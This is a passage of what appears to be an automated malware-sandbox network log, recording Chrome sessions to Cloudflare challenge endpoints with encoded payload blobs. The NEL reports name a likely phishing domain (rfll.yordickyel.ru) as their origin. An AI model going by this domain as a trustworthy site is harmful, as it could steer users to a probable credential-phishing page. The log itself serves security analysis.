                                                                  2025-01-13 21:52:31 UTC3179OUTData Raw: 76 5f 39 30 31 38 39 64 31 38 64 62 37 64 63 34 31 31 3d 6e 66 62 32 6d 32 5a 32 4a 32 65 32 33 47 41 45 47 41 36 32 47 25 32 62 52 4f 51 74 2b 41 55 47 48 48 41 49 73 41 52 6a 32 47 54 41 7a 32 52 62 74 52 34 54 62 41 70 37 54 41 50 4c 47 68 6e 41 69 32 47 36 62 41 52 38 67 66 61 79 41 38 4f 41 59 41 47 66 41 38 62 64 6a 41 73 41 61 6a 52 48 41 4f 6a 37 62 41 4a 6e 4c 61 74 55 41 76 70 37 33 76 75 6b 38 4f 61 48 48 64 6a 52 73 72 41 51 62 61 59 6f 5a 4e 33 39 4b 41 6e 59 39 53 6f 55 54 57 70 74 4b 38 6a 41 34 32 61 71 65 41 47 2d 57 4a 31 42 41 79 6f 32 41 76 4c 41 74 68 65 62 75 63 33 39 58 31 2d 47 59 49 44 57 6d 68 35 4e 73 6b 4f 41 70 31 6d 78 62 41 61 38 4f 6c 32 38 44 78 62 67 73 6d 32 6d 41 37 56 39 41 2d 76 38 41 50 76 6d 41 2d 4d 49 41 2d 4e 64
                                                                  Data Ascii: v_90189d18db7dc411=nfb2m2Z2J2e23GAEGA62G%2bROQt+AUGHHAIsARj2GTAz2RbtR4TbAp7TAPLGhnAi2G6bAR8gfayA8OAYAGfA8bdjAsAajRHAOj7bAJnLatUAvp73vuk8OaHHdjRsrAQbaYoZN39KAnY9SoUTWptK8jA42aqeAG-WJ1BAyo2AvLAthebuc39X1-GYIDWmh5NskOAp1mxbAa8Ol28Dxbgsm2mA7V9A-v8APvmA-MIA-Nd
                                                                  2025-01-13 21:52:31 UTC751INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:31 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 152976
                                                                  Connection: close
                                                                  cf-chl-gen: YMi0Go6Ut6e4INHb6TESoLCqU15soQmvglL+7pOpIwMFtPZLrF73MO8gU/TZtp6Jf+gQudvjDPnUCjYOiudK+iMw4U1f6FAjlhc/b5g7Oh6crESojkiX2wlnii6Ugaau/XabYEwQ3BkW7jf8R2PX6tep8zQ8blpDj4ztrB1nr+VSbJjLDv2g2MqczkVAd6MlFzOIz6U9OCDF1TZ+tbDEv6Tv16Jas2ncrjbj3zGwWDPprrGrNH4GqVn3njkotluuGM3ldh0ysalAQ+ythPEGF7rrwTYZnKFT6Se1bAjnX/7r2Kp3JEVsJJFZi+s52bMW1ZH5ZTX8TsogF8mob4ImH0V/vjPUlcVpGDGqPrbqM78RMUPaZKWEPWmAH9RatCggYRJdWa+VP1uMolE9hD8YVwq23pgZBCwMO18gctfTWMfdRhTF0B/2DbMzlhl6MNZpyF9t5YS95oH/cPqCF6HmVIbILBdyXM5T/afyxXiTtUQ=$vu0/GZGgyIGPzPjIRcZZAw==
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d22b9a9de9b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:31 UTC618INData Raw: 63 30 78 65 64 56 5a 76 56 33 56 6c 69 34 65 56 68 6d 39 57 6e 33 42 38 59 35 56 35 63 58 53 4b 69 70 53 58 58 33 36 46 62 71 6c 6b 69 61 4f 49 73 59 43 48 72 4c 6c 7a 6d 58 57 72 6a 72 53 78 6b 49 43 76 6f 5a 71 66 6b 38 4f 43 66 61 4b 35 7a 36 6e 4d 6f 74 4c 4a 68 70 44 49 79 36 4f 32 31 35 58 53 74 5a 33 4d 74 4c 47 67 75 39 58 67 6d 4f 53 33 6d 2b 71 2b 75 72 61 2f 32 71 61 76 70 4d 69 71 73 37 58 7a 74 75 61 34 2b 66 4c 4c 39 37 69 32 79 62 77 46 7a 50 50 54 34 51 66 6e 77 4d 58 64 32 73 37 4c 2b 39 45 44 38 77 77 52 42 2f 63 5a 35 50 41 51 32 2b 62 6d 45 78 7a 32 33 42 4d 52 42 69 6a 30 45 69 6a 69 46 51 73 70 44 77 45 45 36 51 58 38 36 79 51 4a 4f 43 38 6c 45 42 59 4a 4c 67 34 4f 43 7a 55 55 4e 54 6f 38 45 6a 6b 30 4a 44 77 46 4a 45 49 76 4c 55 64
                                                                  Data Ascii: c0xedVZvV3Vli4eVhm9Wn3B8Y5V5cXSKipSXX36FbqlkiaOIsYCHrLlzmXWrjrSxkICvoZqfk8OCfaK5z6nMotLJhpDIy6O215XStZ3MtLGgu9XgmOS3m+q+ura/2qavpMiqs7Xztua4+fLL97i2ybwFzPPT4QfnwMXd2s7L+9ED8wwRB/cZ5PAQ2+bmExz23BMRBij0EijiFQspDwEE6QX86yQJOC8lEBYJLg4OCzUUNTo8Ejk0JDwFJEIvLUd
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 41 32 56 44 42 5a 59 6a 4d 34 4e 79 74 59 4b 69 59 72 63 56 41 39 5a 54 46 65 54 47 35 4c 4c 47 52 75 64 45 78 36 64 6e 78 39 61 30 35 6a 51 49 53 45 61 58 35 64 56 31 6c 69 64 34 64 61 68 47 36 4a 56 55 69 50 6a 59 5a 56 62 6c 4b 53 6e 48 5a 59 6e 33 39 35 6d 47 32 42 5a 31 36 41 70 5a 75 43 5a 61 36 59 6a 4a 42 71 72 35 2b 70 61 49 43 77 6c 35 56 33 68 5a 31 33 68 33 65 76 74 4a 53 66 76 62 2b 78 76 6e 76 42 72 4a 69 4c 76 73 71 37 72 37 4f 72 74 4b 47 76 69 61 2f 50 78 39 6d 58 73 70 32 65 34 4e 57 68 34 36 79 32 6e 70 2f 59 6f 37 75 6d 75 61 79 2f 33 63 6e 78 70 4f 72 64 37 74 4c 68 30 72 4c 4e 72 62 50 48 2b 38 2f 7a 34 76 43 37 31 76 37 34 36 4f 48 48 36 75 62 6e 32 73 33 69 78 2b 77 54 36 68 51 47 7a 2f 63 58 47 52 54 72 46 65 66 30 48 42 49 4e 37
                                                                  Data Ascii: A2VDBZYjM4NytYKiYrcVA9ZTFeTG5LLGRudEx6dnx9a05jQISEaX5dV1lid4dahG6JVUiPjYZVblKSnHZYn395mG2BZ16ApZuCZa6YjJBqr5+paICwl5V3hZ13h3evtJSfvb+xvnvBrJiLvsq7r7OrtKGvia/Px9mXsp2e4NWh46y2np/Yo7umuay/3cnxpOrd7tLh0rLNrbPH+8/z4vC71v746OHH6ubn2s3ix+wT6hQGz/cXGRTrFef0HBIN7
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 56 4b 56 68 41 4a 55 63 34 4b 54 78 41 58 58 55 73 4c 6d 46 51 56 58 42 71 4e 58 4a 4c 50 44 4d 39 4f 33 5a 5a 67 33 64 79 56 6c 53 45 59 58 78 71 62 35 46 66 6b 46 47 45 62 47 57 42 68 31 4e 36 67 34 36 62 6c 35 32 53 63 31 32 59 66 6f 42 66 68 71 53 59 6d 6d 47 69 62 5a 6c 6c 6b 59 4b 6f 61 34 4f 66 71 4c 47 4c 74 5a 53 46 6d 58 53 55 73 62 79 4c 71 34 2b 32 72 71 4b 68 76 4a 69 54 6c 4d 6e 4c 7a 71 32 6f 77 4b 7a 45 6a 63 43 4d 6b 36 75 6c 72 38 65 31 71 62 79 63 32 64 6d 5a 7a 5a 33 6b 75 71 66 6d 70 74 58 56 77 71 32 73 33 61 7a 76 76 65 2f 43 39 50 48 58 31 65 33 71 72 62 66 46 74 76 37 52 32 74 62 62 30 4e 49 49 30 77 48 38 35 73 66 4c 2b 74 62 68 33 51 72 78 38 77 6a 30 44 4d 2f 74 44 4e 63 5a 47 78 66 31 38 79 48 31 39 42 34 69 35 42 54 78 4a 2f
                                                                  Data Ascii: VKVhAJUc4KTxAXXUsLmFQVXBqNXJLPDM9O3ZZg3dyVlSEYXxqb5FfkFGEbGWBh1N6g46bl52Sc12YfoBfhqSYmmGibZllkYKoa4OfqLGLtZSFmXSUsbyLq4+2rqKhvJiTlMnLzq2owKzEjcCMk6ulr8e1qbyc2dmZzZ3kuqfmptXVwq2s3azvve/C9PHX1e3qrbfFtv7R2tbb0NII0wH85sfL+tbh3Qrx8wj0DM/tDNcZGxf18yH19B4i5BTxJ/
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 53 44 4a 6e 58 6c 4a 30 52 54 52 72 4d 55 63 33 4f 33 52 7a 53 58 6c 68 61 32 4f 44 52 46 43 44 58 47 4a 48 53 47 4a 32 69 49 46 49 63 6f 31 67 6a 35 61 4b 59 48 61 52 56 48 4e 76 65 46 56 5a 57 35 47 52 6d 5a 5a 6d 70 61 56 6b 6d 59 78 6b 5a 61 65 59 65 6f 65 63 72 49 43 6c 67 37 61 45 71 62 69 6c 66 4b 39 37 73 49 6d 4b 73 4a 2b 56 78 59 47 35 68 70 57 68 78 61 72 45 71 73 47 68 7a 49 2b 52 7a 4a 43 50 73 37 47 70 32 34 33 62 7a 36 76 50 6b 74 37 50 72 61 37 5a 32 61 57 61 31 63 71 34 79 61 61 33 78 38 65 78 79 65 75 75 77 4f 62 67 31 4e 54 4a 75 38 54 34 37 4e 4f 36 37 65 4c 73 77 2b 48 2b 78 66 66 52 33 64 66 39 33 63 63 4e 35 2b 55 4c 30 76 37 76 39 42 63 59 32 42 54 30 46 2f 59 51 30 66 30 50 32 68 4c 75 35 66 66 77 49 76 76 67 33 51 72 38 43 43 58
                                                                  Data Ascii: SDJnXlJ0RTRrMUc3O3RzSXlha2ODRFCDXGJHSGJ2iIFIco1gj5aKYHaRVHNveFVZW5GRmZZmpaVkmYxkZaeYeoecrIClg7aEqbilfK97sImKsJ+VxYG5hpWhxarEqsGhzI+RzJCPs7Gp243bz6vPkt7Pra7Z2aWa1cq4yaa3x8exyeuuwObg1NTJu8T47NO67eLsw+H+xffR3df93ccN5+UL0v7v9BcY2BT0F/YQ0f0P2hLu5ffwIvvg3Qr8CCX
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 45 39 33 5a 6c 56 45 56 48 63 32 55 30 31 55 65 6f 51 38 54 33 52 41 53 45 4b 42 58 31 31 39 6a 55 36 4e 58 6c 31 76 59 47 74 69 64 57 52 6a 61 48 46 64 6d 59 65 54 65 48 4e 74 64 6f 47 51 6b 32 46 30 67 32 4e 32 64 32 43 71 6b 5a 4a 71 63 70 2b 4d 6f 6f 53 35 6b 71 71 48 71 62 4b 39 76 33 79 61 74 37 79 43 66 72 66 46 6f 6f 61 55 67 38 69 56 68 71 47 75 71 62 2f 49 73 63 50 51 7a 35 57 36 74 73 79 4f 30 63 61 76 71 4a 6d 72 7a 70 61 66 74 39 62 46 71 61 61 72 36 63 37 73 7a 4c 6e 79 36 64 33 79 73 76 61 33 37 2b 32 31 79 38 61 32 33 50 33 56 37 37 36 31 7a 76 76 58 78 76 59 43 36 50 33 5a 36 51 58 68 7a 51 55 4c 41 2b 51 57 45 41 67 55 45 77 2f 4e 48 66 4d 49 33 43 49 42 37 64 38 5a 33 53 49 42 41 51 6e 69 34 77 6b 67 37 69 4d 76 4b 67 63 65 45 50 30 6b
                                                                  Data Ascii: E93ZlVEVHc2U01UeoQ8T3RASEKBX119jU6NXl1vYGtidWRjaHFdmYeTeHNtdoGQk2F0g2N2d2CqkZJqcp+MooS5kqqHqbK9v3yat7yCfrfFooaUg8iVhqGuqb/IscPQz5W6tsyO0cavqJmrzpaft9bFqaar6c7szLny6d3ysva37+21y8a23P3V7761zvvXxvYC6P3Z6QXhzQULA+QWEAgUEw/NHfMI3CIB7d8Z3SIBAQni4wkg7iMvKgceEP0k
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 6c 71 54 55 70 4b 64 46 46 51 58 6e 42 56 55 6f 68 6e 57 6d 64 6a 64 30 65 51 52 46 75 46 55 59 36 4c 69 31 56 77 68 45 35 7a 62 47 36 49 62 35 4f 69 64 61 57 6e 68 36 4f 62 5a 6f 61 4b 65 36 6d 68 67 71 47 4e 69 71 2b 54 74 61 53 56 6c 71 6d 74 6e 58 52 77 6c 62 69 50 6b 37 4b 6b 75 63 47 33 74 6f 47 57 67 36 4b 33 78 59 69 63 68 36 47 46 69 6f 65 32 71 71 43 78 72 5a 50 64 71 72 44 4b 71 4e 79 78 31 72 47 35 74 4d 4b 6f 70 4e 50 59 35 4d 4f 38 71 73 44 67 35 4f 6d 39 71 38 61 79 31 66 44 71 75 2f 6e 33 2f 62 6e 72 75 66 6e 79 37 4f 37 50 77 41 6e 30 77 51 76 6b 41 4e 34 4c 35 74 76 4e 37 75 6f 48 43 64 44 72 44 65 77 54 38 77 30 4a 44 42 2f 5a 32 2f 6b 46 47 43 67 53 33 2f 33 67 48 2b 51 6f 35 43 50 36 42 77 59 4c 37 43 45 43 4c 67 6b 62 4e 79 34 31 4b
                                                                  Data Ascii: lqTUpKdFFQXnBVUohnWmdjd0eQRFuFUY6Li1VwhE5zbG6Ib5OidaWnh6ObZoaKe6mhgqGNiq+TtaSVlqmtnXRwlbiPk7KkucG3toGWg6K3xYich6GFioe2qqCxrZPdqrDKqNyx1rG5tMKopNPY5MO8qsDg5Om9q8ay1fDqu/n3/bnrufny7O7PwAn0wQvkAN4L5tvN7uoHCdDrDewT8w0JDB/Z2/kFGCgS3/3gH+Qo5CP6BwYL7CECLgkbNy41K
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 38 57 55 5a 55 57 32 4a 6c 51 31 75 43 61 47 39 64 58 59 4e 4e 61 34 56 73 68 31 53 47 62 57 5a 64 6a 31 6c 5a 6a 58 56 38 65 48 79 52 65 4a 43 69 69 49 4b 6c 70 6f 52 74 6e 61 71 68 6e 71 52 2f 68 71 53 5a 6b 4c 6d 74 6b 58 6d 2f 6b 48 69 51 6a 36 2b 64 72 61 53 46 77 72 69 31 6b 33 36 45 67 4a 7a 49 6e 61 61 37 72 72 32 77 6b 64 66 49 32 4a 71 76 6d 72 47 6f 75 37 4c 52 6e 74 75 6c 35 64 4c 41 75 73 44 62 78 65 61 75 36 2b 47 2f 33 76 54 47 35 2b 54 56 39 73 76 4a 37 75 58 77 7a 75 33 38 30 76 7a 77 42 4e 59 46 39 77 65 2f 34 76 7a 4b 35 4f 76 4e 78 67 66 53 37 2f 37 4d 41 52 54 76 39 64 48 78 37 75 59 51 33 41 73 62 32 42 7a 32 38 50 34 68 2b 53 73 6c 46 51 44 34 44 78 30 44 41 78 51 56 37 77 4d 4a 49 4f 34 36 4a 52 55 4e 48 6a 6e 32 4c 7a 34 36 4c 78
                                                                  Data Ascii: 8WUZUW2JlQ1uCaG9dXYNNa4Vsh1SGbWZdj1lZjXV8eHyReJCiiIKlpoRtnaqhnqR/hqSZkLmtkXm/kHiQj6+draSFwri1k36EgJzInaa7rr2wkdfI2JqvmrGou7LRntul5dLAusDbxeau6+G/3vTG5+TV9svJ7uXwzu380vzwBNYF9we/4vzK5OvNxgfS7/7MARTv9dHx7uYQ3Asb2Bz28P4h+SslFQD4Dx0DAxQV7wMJIO46JRUNHjn2Lz46Lx
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 67 56 71 45 6b 45 74 6d 55 47 68 54 67 57 6c 79 55 35 57 44 68 35 32 49 58 48 71 59 63 34 32 53 66 4a 4f 58 58 32 65 41 6b 36 68 33 64 34 43 50 71 59 4b 78 72 58 52 75 73 58 4b 6a 6a 72 46 79 6a 4a 69 50 71 35 36 42 65 5a 2b 75 76 6e 69 44 76 62 4b 39 74 59 61 39 77 38 6a 4f 77 34 71 71 74 4b 57 76 73 72 6a 4d 72 37 71 33 6c 71 65 32 77 4e 44 42 34 62 72 58 6d 4d 4c 64 34 64 62 57 34 65 54 45 32 2b 4b 72 35 61 33 6b 72 2f 50 4b 36 73 58 53 30 73 71 37 79 75 69 33 37 39 44 59 37 63 33 62 42 67 54 57 41 67 76 5a 35 67 76 37 37 64 7a 70 2f 63 34 55 38 66 6a 55 47 51 63 49 31 41 34 62 38 42 4d 63 38 43 45 68 33 76 67 47 2f 50 49 57 4c 53 59 4b 36 42 6f 52 42 42 34 56 43 67 76 73 49 7a 6f 33 39 43 51 2b 4f 66 67 32 39 2f 4d 34 4f 51 49 59 4d 30 45 6e 46 68 35
                                                                  Data Ascii: gVqEkEtmUGhTgWlyU5WDh52IXHqYc42SfJOXX2eAk6h3d4CPqYKxrXRusXKjjrFyjJiPq56BeZ+uvniDvbK9tYa9w8jOw4qqtKWvsrjMr7q3lqe2wNDB4brXmMLd4dbW4eTE2+Kr5a3kr/PK6sXS0sq7yui379DY7c3bBgTWAgvZ5gv77dzp/c4U8fjUGQcI1A4b8BMc8CEh3vgG/PIWLSYK6BoRBB4VCgvsIzo39CQ+Ofg29/M4OQIYM0EnFh5
                                                                  2025-01-13 21:52:31 UTC1369INData Raw: 58 36 41 59 6d 31 55 55 6f 4e 69 64 58 43 4e 62 4a 32 52 59 56 36 6a 6c 70 31 31 66 5a 43 6e 65 34 43 4d 67 33 65 69 65 6f 69 46 6d 37 42 2b 62 6f 4b 6a 65 58 47 48 6b 72 57 4d 66 33 32 67 6a 35 6d 7a 6d 6e 79 42 71 4d 65 64 71 38 75 39 76 4d 36 49 73 4c 50 44 78 71 44 4d 30 4b 4f 58 32 4e 65 56 72 39 6a 53 72 74 65 36 77 35 72 57 73 38 58 6b 71 4c 32 38 36 2b 61 67 71 65 6e 45 72 36 76 78 7a 4c 62 41 39 72 58 45 2b 4c 6a 54 33 66 66 76 76 2b 72 61 74 76 4c 31 38 2f 72 32 35 76 54 63 2f 51 45 45 33 78 48 39 35 75 4d 56 30 51 58 6e 35 73 77 4c 37 42 37 56 39 68 44 78 41 66 58 67 4a 51 63 6c 42 77 63 5a 33 65 73 50 47 77 51 67 45 68 2f 38 49 77 4d 76 43 53 51 77 43 7a 51 54 4a 69 63 39 51 42 6f 69 2f 52 38 36 4f 77 46 46 48 66 78 49 51 6a 64 41 43 7a 41 53
                                                                  Data Ascii: X6AYm1UUoNidXCNbJ2RYV6jlp11fZCne4CMg3eieoiFm7B+boKjeXGHkrWMf32gj5mzmnyBqMedq8u9vM6IsLPDxqDM0KOX2NeVr9jSrte6w5rWs8XkqL286+agqenEr6vxzLbA9rXE+LjT3ffvv+ratvL18/r25vTc/QEE3xH95uMV0QXn5swL7B7V9hDxAfXgJQclBwcZ3esPGwQgEh/8IwMvCSQwCzQTJic9QBoi/R86OwFFHfxIQjdACzAS


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.449770104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:31 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:31 UTC240INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:31 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  cache-control: max-age=2629800, public
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d231b81437a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.44977135.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:31 UTC543OUTOPTIONS /report/v4?s=PkFnTH2Fgy%2FvJWwLVTdDXa%2FiDVhGvJM2fqAW1%2BIVns4v6HetFP7TV%2F4ou5RIJjPS1Vcumero%2FHv0DyrZf3swgXUJnzQgCzYt1qNXP3pRCTKLR0vQfU1luF17%2FXqqsQ%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://rfll.yordickyel.ru
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:31 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: OPTIONS, POST
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-type, content-length
                                                                  date: Mon, 13 Jan 2025 21:52:30 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.44977235.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:31 UTC482OUTPOST /report/v4?s=PkFnTH2Fgy%2FvJWwLVTdDXa%2FiDVhGvJM2fqAW1%2BIVns4v6HetFP7TV%2F4ou5RIJjPS1Vcumero%2FHv0DyrZf3swgXUJnzQgCzYt1qNXP3pRCTKLR0vQfU1luF17%2FXqqsQ%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 430
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:31 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 66 6c 6c 2e 79 6f 72 64 69 63 6b 79 65 6c 2e 72 75 2f 31 36 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 32 2e 32 31 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":127,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rfll.yordickyel.ru/16E/","sampling_fraction":1.0,"server_ip":"104.21.92.210","status_code":404,"type":"http.error"},"type":"network-error",
                                                                  2025-01-13 21:52:31 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Mon, 13 Jan 2025 21:52:31 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.449775104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:32 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:32 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:52:32 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: AwdvfJZqjHTebAoc1xSaSw==$AAxiDLe9fATFSmy6mLFY4w==
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d2a1bdf434b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:32 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.449776104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:32 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/90189d18db7dc411/1736805151192/4c683360827d691425d2166077a4e8394bbb41868f789c52dc45648af072ad47/6TTr-A3z7QYXfqu HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Cache-Control: max-age=0
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:32 UTC143INHTTP/1.1 401 Unauthorized
                                                                  Date: Mon, 13 Jan 2025 21:52:32 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 1
                                                                  Connection: close
                                                                  2025-01-13 21:52:32 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 54 47 67 7a 59 49 4a 39 61 52 51 6c 30 68 5a 67 64 36 54 6f 4f 55 75 37 51 59 61 50 65 4a 78 53 33 45 56 6b 69 76 42 79 72 55 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gTGgzYIJ9aRQl0hZgd6ToOUu7QYaPeJxS3EVkivByrUcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                  2025-01-13 21:52:32 UTC1INData Raw: 4a
                                                                  Data Ascii: J


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.449777104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:33 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/90189d18db7dc411/1736805151193/BfLhLnbiO9Yqi-I HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
